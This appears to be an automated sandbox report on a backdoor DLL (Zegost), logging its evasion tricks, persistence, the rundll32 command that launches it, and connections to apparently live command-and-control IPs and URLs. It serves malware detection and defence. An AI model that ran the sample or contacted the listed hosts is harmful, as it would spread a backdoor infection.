Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_4-29821)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_100086B3 rdtsc 4_2_100086B3
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 1800000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 300000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 3600000
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 4603
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 3125
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_4-30018)
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 0.0 %
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3392 Thread sleep count: 48 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3404 Thread sleep count: 4603 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3404 Thread sleep time: -8285400000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2376 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 872 Thread sleep time: -2400000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3124 Thread sleep time: -2400000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 736 Thread sleep time: -1440000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6384 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2376 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1656 Thread sleep count: 77 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1656 Thread sleep time: -23100000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1940 Thread sleep time: -7200000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3404 Thread sleep count: 3125 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3404 Thread sleep time: -5625000000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: rundll32.exe, 00000004.00000002.3142057181.00000000033FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL!/i
Source: Amcache.hve.14.dr Binary or memory string: VMware
Source: Amcache.hve.14.dr Binary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
Source: rundll32.exe, 00000004.00000002.3141581942.0000000002F6B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: s\Applications\\VMwareHo
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \VMwareHostOpen.exes
Source: Amcache.hve.14.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3142057181.00000000033FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.14.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr Binary or memory string: vmci.sys
Source: rundll32.exe, 00000004.00000002.3141792105.0000000003275000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: re\Classes\Applications\\VMwareHostOpen.exes\Applications\\VMwareHostOpen.exeion\\Run\User Shell Foldersockdown_Zones\45
Source: rundll32.exe, 00000004.00000003.1818277830.0000000003277000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: y\Machine\Software\Classes\Applications\\VMwareHostOpen.exes\Applications\\VMwareHostOpen.exeion\\Run\User Shell Foldersockdown_Zones\4
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.14.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.14.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1000CD1A LdrInitializeThunk,11_2_1000CD1A

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 107.163.56.232 18963
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 107.163.56.231 18530
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 107.163.56.110 18530
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 107.163.56.251 6658
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 116.133.8.92 443
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: C:\Windows\SysWOW64\rundll32.exe Device IO: \Device\Harddisk0\DR0
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
OS Credential Dumping1
File and Directory Discovery
Remote Services1
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/Job11
Registry Run Keys / Startup Folder
1
Access Token Manipulation
3
Obfuscated Files or Information
LSASS Memory111
System Information Discovery
Remote Desktop ProtocolData from Removable Media11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)111
Process Injection
1
Software Packing
Security Account Manager31
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive11
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
Registry Run Keys / Startup Folder
1
DLL Side-Loading
NTDS31
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Masquerading
LSA Secrets1
Process Discovery
SSHKeylogging13
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
Virtualization/Sandbox Evasion
Cached Domain Credentials1
Application Window Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Access Token Manipulation
DCSync1
Remote System Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
Process Injection
Proc Filesystem1
System Network Configuration Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Rundll32
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Behavior Graph ID: 1578341  Sample: 2JSGOlbNym.dll  Startdate: 19/12/2024  Architecture: WINDOWS  Score: 100

Graph-level DNS/IP nodes: blogx.sina.com.cn, blog.sina.com.cn, bg.microsoft.map.fastly.net
Graph-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 5 other signatures

Process tree (per-node signatures in brackets, network destinations after "->"):
  loaddll32.exe
    cmd.exe [Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks]
      rundll32.exe [Queries disk data (e.g. SMART data)]
        cmd.exe [Uses ping.exe to sleep]
          PING.EXE -> 127.0.0.1 unknown unknown
          conhost.exe
    rundll32.exe [System process connects to network (likely due to code injection or exploit); Found evasive API chain (may stop execution after checking mutex); Creates an autostart registry key pointing to binary in C:\Windows]
      -> 107.163.56.110, 18530, 49706 TAKE2US United States
      -> 107.163.56.231, 18530, 49705 TAKE2US United States
      -> 3 other IPs or domains
    rundll32.exe [Queries disk data (e.g. SMART data)]
      cmd.exe [Uses ping.exe to sleep]
        conhost.exe
        PING.EXE
    5 other processes
      WerFault.exe
      WerFault.exe
  rundll32.exe
    cmd.exe
      conhost.exe
      PING.EXE
  rundll32.exe
    cmd.exe
      conhost.exe
      PING.EXE

Source | Detection | Scanner | Label | Link
2JSGOlbNym.dll | 89% | ReversingLabs | Win32.Backdoor.Zegost |
2JSGOlbNym.dll | 100% | Avira | TR/ATRAPS.Gen |
2JSGOlbNym.dll | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
blogx.sina.com.cn | 116.133.8.92 | true | false | | high
blog.sina.com.cn | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://107.163.56.110:18530/u1129.html | false | | high
http://107.163.56.231:18530//joy.asp?sid=rungnejcndvgnJLgFe5vteX8v2LUicbtudb8mtiWote1mdC@ | true | | unknown
https://blog.sina.com.cn/u/5762479093 | false | | high
http://107.163.56.232:18963/main.php | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://blog.sina.com.cn/u/5762479093. | rundll32.exe, 00000004.00000003.2556967155.0000000003448000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://107.163.56.232:18963/main.phpz | rundll32.exe, 00000004.00000003.2088146203.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2271435825.000000000346F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742497839.000000000346B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2331159571.000000000346F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3142349682.000000000346E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698318369.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2048262061.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2639896838.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2474003270.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004095280.000000000346B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2617981049.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1948233905.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003960520.000000000346B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004269504.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2618541737.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743122739.000000000346A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1948360391.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2189990128.000000000346F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2311599271.000000000346F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2087959262.0000000003470000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://107.163.56.232:18963/main.phph_Xj | rundll32.exe, 00000004.00000002.3142349682.0000000003436000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://blog.sina.com.cn/u/5762479093ion | rundll32.exe, 00000004.00000003.2419740054.000000000658D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://107.163.56.232:18963/main.phps | rundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://107.163.56.232:18963/main.phpt | rundll32.exe, 00000004.00000003.2821196346.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742497839.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742387741.0000000003444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698703869.000000000344A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743299996.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2820845242.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743122739.0000000003453000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://107.163.56.232:18963/main.phpq | rundll32.exe, 00000004.00000003.2392885098.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1948233905.0000000003448000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://blog.sina.com.cn/u/5762479093) | rundll32.exe, 00000004.00000003.2087959262.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2088272685.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2048262061.0000000003448000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://107.163.56.231:18530//joy.asp?sid=rungnejcndvgnJLgFe5vteX8v2LUicbtudb8mtiWote1mdC | rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://blog.sina.com.cn/u/5762479093ws | rundll32.exe, 00000004.00000003.2698703869.000000000344A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003448000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://107.163.56.232:18963/main.phpzF | rundll32.exe, 00000004.00000003.2474003270.0000000003448000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://blog.sina.com.cn/u/%s | rundll32.exe, 00000004.00000002.3144079935.0000000005164000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://blog.sina.com.cn/u/5762479093 | rundll32.exe, 00000004.00000003.1880671676.0000000005164000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://107.163.56.231:18530/ | rundll32.exe, rundll32.exe, 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmp | false | | unknown
http://blog.sina.com.cn/u/5762479093W5 | rundll32.exe, 00000004.00000002.3142349682.0000000003446000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://107.163.56.232:18963/main.phpn_Vj= | rundll32.exe, 00000004.00000003.3003722546.0000000003430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003936099.0000000003433000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004403420.0000000003436000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://107.163.56.232:18963/main.phpzP | rundll32.exe, 00000004.00000003.2087959262.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2088272685.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2048262061.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2108671185.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2108538843.0000000003448000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://107.163.56.232:18963/main.php. | rundll32.exe, 00000004.00000003.2698113804.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2821196346.000000000346A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://blog.sina.com.cn/u/5762479093z | rundll32.exe, 00000004.00000003.1882444552.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1881972939.000000000346D000.00000004.00000020.00020000.00000000.sdmp | false | | high
